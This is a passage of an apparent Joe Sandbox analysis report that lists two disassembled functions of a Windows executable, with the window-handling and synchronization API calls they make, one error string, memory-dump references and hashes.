                                                                                                                                        • Instruction Fuzzy Hash: 21115B70309212ABDF219F29EC12F6A339AAF84B10B44812EF816DB182DB6CDC0183D0
                                                                                                                                        Function 007912E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079CED7: GetWindowRect.USER32(?,?), ref: 0079CF0E
                                                                                                                                          • Part of subcall function 0079CED7: GetClientRect.USER32(?,?), ref: 0079CF1A
                                                                                                                                          • Part of subcall function 0079CED7: GetWindowLongW.USER32(?,000000F0), ref: 0079CFBB
                                                                                                                                          • Part of subcall function 0079CED7: GetWindowRect.USER32(?,?), ref: 0079CFE8
                                                                                                                                          • Part of subcall function 0079CED7: GetWindowTextW.USER32(?,?,00000400), ref: 0079D007
                                                                                                                                        • GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                        • SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Rect$Text$ClientItemLong
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 660763476-4108050209
                                                                                                                                        • Opcode ID: d6241022b6bc3b61c51dbd0a611026de17c8a3858bfd1d3421fc65d1555e3b51
                                                                                                                                        • Instruction ID: 29f0991074eb47e4fc874ae273a6db044d012378a9da1e736d2bdbda038f657d
                                                                                                                                        • Opcode Fuzzy Hash: d6241022b6bc3b61c51dbd0a611026de17c8a3858bfd1d3421fc65d1555e3b51
                                                                                                                                        • Instruction Fuzzy Hash: 5EF031B154024DABDF161F51AC19AA93F69AB04749F88C018FE4954991CB7CC860DB58
                                                                                                                                        Function 0079FAC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,0079FD0B,?,?,0079FD80,?,?,?,?,?,0079FD6A), ref: 0079FACD
                                                                                                                                        • GetLastError.KERNEL32(?,?,0079FD80,?,?,?,?,?,0079FD6A), ref: 0079FAD9
                                                                                                                                          • Part of subcall function 00796DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00796DF1
                                                                                                                                        Strings
                                                                                                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0079FAE2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                        • API String ID: 1091760877-2248577382
                                                                                                                                        • Opcode ID: 87b6be803d33a024d63c2a7b0492d65fcc9e4e15fbda458ae351a1ec853300ee
                                                                                                                                        • Instruction ID: 60a9db770f0b51f11c6ae4b22c8d64e66c19e05c45d9ef676c5ffc2ce38e2b6b
                                                                                                                                        • Opcode Fuzzy Hash: 87b6be803d33a024d63c2a7b0492d65fcc9e4e15fbda458ae351a1ec853300ee
                                                                                                                                        • Instruction Fuzzy Hash: 33D05EB1608431A7DE0137286C0AF6E3A04AF12730F65872DF139A51E5CE2C0C9142D5